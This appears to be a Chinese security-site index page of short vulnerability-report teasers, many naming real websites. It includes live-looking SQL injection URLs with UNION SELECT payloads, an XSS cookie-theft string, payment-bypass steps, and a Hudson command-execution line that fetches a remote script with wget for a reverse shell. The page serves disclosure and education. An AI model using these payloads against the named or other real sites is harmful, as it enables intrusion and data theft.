爱卡汽车含sql漏洞致数据库信息泄露及修复 - 网关注热度:19

汽车频道火狐中文网存在sql漏洞，可以拿到管理权限，目前已被脱裤！详细说明：http://firefox.xcar.com.cn/content.php?id=422298注入点漏洞证明：修复方案：加强过滤作者 踏歌公子..[详情]

丁香人才任意简历查看越权 - 网站安全 - 自学p关注热度:39

某简历设置不对处开放，访问会出现：该简历不存在或已设置为不对外开放，无法直接查看，谢谢！如需解释帮助，请联系丁香人才网客服：400-657-1101。或者非企业会员，访问简历会出..[详情]

几招网站遭受攻击时的处理方法 - 网站安全 - 自关注热度:17

总有网站求救：网站遭到攻击了,网站首页被人篡改了，网站数据库访问不到了.我们总是在告诉站长要解决问题首先要怎么样，其次要怎么样，直到最后才深入到技术要解决的方面。有时..[详情]

OpenConf <= 4.11 (author/edit.php)远程盲注缺陷及修复关注热度:26

?php/* --------------------------------------------------------------------- OpenConf = 4.11 (author/edit.php) Remote Blind SQL Injection Exploit -------------------------------------.....[详情]

DedeCms <= V5.7 (最新版) 任意文件删除漏洞 - 网站关注热度:21

利用条件:magic_quotes_gpc=Off 可删除任意后缀文件magic_quotes_gpc=On 可删除jpg|gif|png后缀文件PHP版本要求支持空字节截断./member/edit_face.php 、./member/edit_space_info.php等文件都有类似的代码，.....[详情]

115网盘支付绕过缺陷及修复 - 网站安全 - 自学p关注热度:94

购买115网盘的VIP或者扩容的时候，使用FIDDLE截取数据包，修改购买的年份，当超过一定月份时，不再用月份X单价，而是直接显示支付金额为0。。可能解释不清楚，看了下面的图你就懂的..[详情]

零六团购网存储型XSS及修复 - 网站安全 - 自学p关注热度:13

零六团团购网，个人收货地址(收件人、街道地址)存储型XSS。详细说明：收件人和街道地址框填入=rsquo;scriptalert(document.cookie)/script漏洞证明：修复方案：过滤并限制收件人长度，相信你们..[详情]

百度数据研究中心XSS & 激活账号 & 密码修改关注热度:88

在百度数据研究中心注册帐号http://data.baidu.com/register.html然后提示您已注册成功，请登录您的邮箱完成激活！登录帐号，提示该账号未激活！,点击下面重新发送验证邮件按钮先跳转到h..[详情]

siteserver cms 3.4.5鸡肋漏洞及修复 - 网站安全 - 自学关注热度:38

此漏洞跟原来的漏洞 手法非常相似！满足两个条件 系统开放注册 iis6注册账户-文档附件管理-上传文件 我们新建一层目录 当然 之前是可以建立*.asp 的目录 在3.4.5中已经过滤我们还是建..[详情]

webhack入侵思路–上传漏洞及其防御 - 网站安全关注热度:22

这里首先要表达一个观点，入侵网站说到底就是获得网站的管理权限，当然这个权限应该高于web站点后台管理权限（只拿到个后台的都不好意思拿出去跟别人打招呼，是吧），也可以这..[详情]

MSSQL备份导出Shell中文路径解决办法 - 网站安全关注热度:48

折腾了好些会 终于找到相关的方法了，估计有很多大牛其实早就知道了，MARK一下。某学校换了网站程序，害得我又给重新弄，老方法，任意文件下载来数据库配置文件，然后连接数据库..[详情]

QVODCMS V4.0相关漏洞利用及修复 - 网站安全 - 自学关注热度:22

先是上传：位于admin/Fckeditor/maxcms_upload.htm 可以直接访问maxcms_upload.htm ：form name=form id=form enctype=multipart/form-data action=maxcms_upload.asp?act=up method=post调用ma.....[详情]

去哪网站flash资源xss漏洞及修复 - 网站安全 - 自学关注热度:23

去哪资源站中的flash可造成xss造成跨站，可被利用做钓鱼，窃取cookies。详细说明：去哪儿资源站http://source.qunar.com中的falsh文件clickTag参数均为进行过滤而且直接展示在网址中，更改参数..[详情]

TOM意见反馈管理系统后台注射 - 网站安全 - 自学关注热度:19

http://advice.tom.com/admin/admin_login.php一般来说，搞大站想直接从主站突破的话，机会很小.但如果分站被拿下.黑阔就会利用分站收集得到的信息.或者在内网XX什么的.到时候就不好拉！顺便问..[详情]

TOM分站存在注入漏洞可手工爆帐号跟密码 - 网站关注热度:39

漏洞证明：http://dgbest.tom.com/special_issue.php?id=-37 union select group_concat(column_name) from information_schema.columns where table_name=0x6467626573745F61646D696E--http://dgbest.to.....[详情]

新浪微号存在支付绕过漏洞 - 网站安全 - 自学p关注热度:26

在申请微号的过程中，在提交订单的时候，使用Fiddler进行数据的拦截，断下后往下走的时候，会发现有一个Webforms中的Body中有本次支付的金额，将这个金额修改成1后（我是修改成1的）..[详情]

桃园网盘通杀所有版本的注入0day及修复 - 网站安关注热度:24

小菜之作 大牛勿笑ps: 官方也存在漏洞未修补 不要乱搞没事蛋疼审计代码挖到两个0day 都是桃园网盘的一个getshell 一个注入以下是注入0dayhttp://www.2cto.com /myly.aspx?username=注册的用户名@乌云..[详情]

书旗小说网SQL注射漏洞及修复 - 网站安全 - 自学关注热度:40

由于没有对参数进行正确过滤，导致SQL注射漏洞漏洞证明：注入点:http://yc.shuqi.com/yc_pagefile/boat.php?action=notice_infonoid=177数据库:book_new版本:5.0.90-log用户名:ppro@172.18.20.215得到的表和用户....[详情]

申通快递+如风达快递SQL注入 - 网站安全 - 自学关注热度:64

建议做一下过滤作者Falcon..[详情]

同仁堂集团网站sql注入及修复 - 网站安全 - 自学关注热度:27

中国北京同仁堂（集团）官网存在sql注入漏洞。。好歹也市值:191.53亿元。。详细说明：http://www.tongrentang.com/trtxsqy/introduce_yc.php?id=#39;%60%228rk1BError: exception #39;PDOException#39; wi.....[详情]

千博企业网站管理系统HitCount.Asp页面注入漏洞关注热度:21

程序都加入了防注入代码的，在NoSql.asp文件中7kccopyd-code%If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = rsquo;|;|and|exec|i.....[详情]

首家实名制相亲平台我在找你任意命令执行 - 网关注热度:35

Hudson版本太低，无用户验证功能，可直接任意执行系统命令漏洞证明：http://59.151.1.116:8080/script反弹shelljava.lang.Runtime.getRuntime().exec(#39;wget http://www.XXX.com/uploads/XX.pl -O /tmp/XX.....[详情]

拍客piikee竞拍网站系统注射漏洞及修复 - 网站安关注热度:31

因没有厂商，就写个竞拍系统吧，传出来好给用这系统的站长提个醒。该系统名为：拍客piikee竞拍网站系统为什么说2B那？前台所有文件参数值都这样来的，大家看下这段代码news_arc.ph..[详情]

北京汽车集团官网SQL注射漏洞及修复 - 网站安全关注热度:25

由于没有对参数进行正确过滤，导致SQL注射漏洞详细说明：http://www.baihc.com/website/news_content.php?id=322type=1,此URL的ID字段由于没有对参数进行正确过滤，导致SQL注射漏洞漏洞证明：注入点..[详情]

网站服务器被挂马的处理方案 - 网站安全 - 自学关注热度:21

www.2cto.com：有360软文嫌疑啊本方案主要解决网站的WEB服务器出现木马的情况后，操作指导手册。根据先期摸索处理的经验，整理此文档，若有不足，请指出补充。前言：服务器木马的防..[详情]

Wordpress插件Zingiri Web Shop <= 2.4.0多个xss问题 - 网关注热度:18

Wordpress Zingiri Web Shop Plugin = 2.4.0 Multiple XSS Vulnerabilities作者: Mehmet Ince www.2cto.com程序作者: http://www.zingiri.com影响版本: 2.3.0 和 2.4.0已测试标题： Wordpress.....[详情]

PHP Volunteer Management 1.0.2多个缺陷及修复 - 网站安关注热度:17

标题: PHP Volunteer Management #39;id#39; 1.0.2 Multiple Vulnerabilities作者: G13 www.2cto.com下载地址: https://sourceforge.net/projects/phpvolunteer/影响版本: 1.0.20x01 描述0x02 XS.....[详情]

POST表单与上传突破JS后缀名检查分析 - 网站安全关注热度:30

本文纯属科普文，在看本文前，请简单了解一下GET与POST的区别：《网站表单接收信息提交方式：Get与Post 小讲》如果这个文章你没看懂，或者不想看，那么我来给你更简单的讲一下GET与..[详情]

网站表单接收信息提交方式：Get与Post小讲 - 网站关注热度:20

这个是涉及网络传输安全的，这对SQL注入检测也是至关重要的给大家科普下浏览网站时，网站服务器获取数据主要靠两种方式：Get与postGet：GET是一个HTTP将各种信息提交到服务器方法。..[详情]

服务器架设环境探测分析 - 德国第二电视台网站关注热度:18

先发些手记在这里。看了能不能得到得到灵感。地址：www.zdf.de进去一看，呵，全部是html的。节目表要不断变，百分之九九是动态的，而且有后台。之所以是html的，原因可能有三：1、在..[详情]